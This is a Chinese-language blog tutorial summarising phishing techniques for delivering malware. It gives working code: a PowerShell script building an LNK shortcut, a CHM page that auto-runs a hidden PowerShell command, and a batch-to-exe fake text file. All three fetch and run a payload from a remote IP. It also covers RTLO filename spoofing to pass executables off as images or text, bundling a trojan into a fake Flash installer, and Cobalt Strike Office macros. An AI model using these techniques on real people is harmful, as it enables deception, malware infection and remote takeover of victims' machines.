钓鱼姿势汇总

2021-02-03  本文已影响0人  CSeroad

前言

随着钓鱼攻击的流行,赶紧把这块知识补充上。

lnk 快捷方式

简介

lnk 快捷方式放在硬盘上,用来方便使用者快速的调用。

应用

powershell命令快速生成lnk样本
如:a.ps1

$WshShell = New-Object -comObject WScript.Shell  
$Shortcut = $WshShell.CreateShortcut("Desktop.lnk")  
$Shortcut.TargetPath = "%SystemRoot%\\system32\\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\\System32\\Shell32.dll,15"  
$Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c echo (new-object net.webclient).DownloadString('http://106.xx.xx.xx:82/a')"  
$Shortcut.Save()

icon 序号参考 https://help4windows.com/windows_7_shell32_dll.shtml

image.png

当点击Desktop 快捷方式时,就会执行powershell命令。

image.png

文件后缀RTLO

简介

RTLO全名为"RIGHT-TO-LEFTOVERRIDE",是一个不可显示的控制类字符,本质是unicode 字符。"RTLO"字符可使电脑将任意语言的文字内容按倒序排列。

应用

方法一:
对任意文件重命名,右键选择插入unicode控制字符--->RLO ,从右向左显示。

image.png

如输入fdp,从右向左显示即为pdf。
所以aaa.txt 就被重命名为aaatxt.pdf。但看文件属性依然是txt文本。

image.png

方法二:
使用python对文件重命名

import os  
os.rename('apele.exe', 'apele\u202egnp.exe')
image.png

将恶意exe程序伪装为png图片,比较有迷惑性。

CHM文档

简介

CHM(Compiled Help Manual)即"已编译的帮助文件"。它是微软老式帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。

应用

创建index.html文件

<!DOCTYPE html>
<html>
    <head>
        <title>hello</title>
    </head>
    <body>
        This is a test demo!
        <OBJECT id="x" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
            <PARAM name="Command" value="ShortCut">
            <PARAM name="Button" value="Bitmap::shortcut">
            <PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://106.xx.xx.xx:82/a')">
        </OBJECT>
        <SCRIPT>
            x.Click();
        </SCRIPT>
    </body>
</html>

使用EasyCHM工具选择编译为CHM

image.png image.png

编译结束后。点击tmp.chm文件,即可触发powershell命令。

txt 钓鱼

简介

伪造txt文本的恶意程序,来迷惑对方更容易中招。实际上看似是txt文本实际为exe恶意程序。

应用

首先下载Bat_To_Exe_Converter项目
该项目利用bat转为exe,来生成exe恶意程序。
命令如下:

notepad
chcp 1200 & powershell  -c "IEX(New-Object Net.WebClient)."DownloadString"('ht‘+’tp://106.53.97.7:82/a')"
image.png

再加入文本文件的ico图标,然后设置windows 不可见(即在点击是没有窗口执行)。
生成exe恶意程序。

image.png

利用文件后缀RTLO修改为txt后缀。重命名为applexe.txt。看似更加逼真。

image.png

当点击打开带txt文件,程序首先执行notepad打来txt,当关闭时执行powershell恶意代码。

自解压

简介

自解压指的是在没有压缩软件的主机上也可以进行解压的技术,生成的是exe文件。并可以设置在解压时执行某一段程序,这段程序被称为sfx程序。

应用

选择一个360.exe木马程序和一个flash安装程序flashplaye.exe。
选中这两个文件,创建自解压格式压缩文件。

image.png

选择高级---自解压文件选项---常规,填写解压路径C:\windows\temp

image.png

选择高级---设置,设置提取后运行的程序。

C:\windows\temp\360.exe
C:\windows\temp\flashplaye.exe
image.png

选择高级---模式---全部隐藏
选择高级---更新---"解压并更新文件"和"覆盖所有文件"
确定之后,桌面产生Desktop.exe文件。

image.png

此时利用ResourceHacker导出flash的ico图标。

image.png

利用同样的方法打开制作好的自解压捆绑木马,替换flash的图标,确认之后点击文件另存在。重新命名为flashplayerpp_install_cn_32.0.0.371.exe

image.png

当点击该flash进行更新时,就会解压执行360.exe恶意应用程序。

超长文件名

简介

如果文件名的长度大于指定的长度,超过40个字符长度,文件名末尾就会被隐藏。

应用

如下图伪造一个putty程序。

image.png

office宏

简介

宏攻击,是一种古老的攻击手法,在office中插入恶意的vbs代码,来执行恶意shellcode。在cs中就有现成的宏攻击。

应用

选择Cobalt Strike主界面中attacks--->packages--->ms office macro

image.png

创建宏word。点击 "Word 选项-->自定义功能区-->开发者工具(勾选) "

image.png

点击"开发工具"---"宏",新建宏名,点击创建。添加代码。

image.png

然后另存为启用宏的docm文件。
默认情况下,Office已经禁用所有宏。
这里修改设置为

image.png

当重新打开word文档时,CobaltStrike即会上线。

image.png

待补充

总结

  1. 邮件发送待解压rar文件,使用自解压触发恶意程序;
  2. xss配置flash钓鱼;
  3. 邮件发送word文档、excel表格,嵌入恶意程序;

参考资料

https://paper.seebug.org/1329/#part-2
https://www.shuzhiduo.com/A/QW5YN1oqdm/
https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247485861&idx=1&sn=a4b87208c753c317240c7ae063871cdb&chksm=9b392f14ac4ea60240ca3c84f39f65a3b5584a08dbcf07b6962c3464ae282c3a1003fa3de37a&mpshare=1&scene=23&srcid=0730e0o8JsXU5nKshFt8XOPS&sharer_sharetime=1596118625552&sharer_shareid=ff83fe2fe7db7fcd8a1fcbc183d841c4#rd
http://45.158.34.4/2020/08/06/gofish/
https://www.anquanke.com/post/id/198540
https://www.sec-in.com/article/847

上一篇 下一篇

猜你喜欢

热点阅读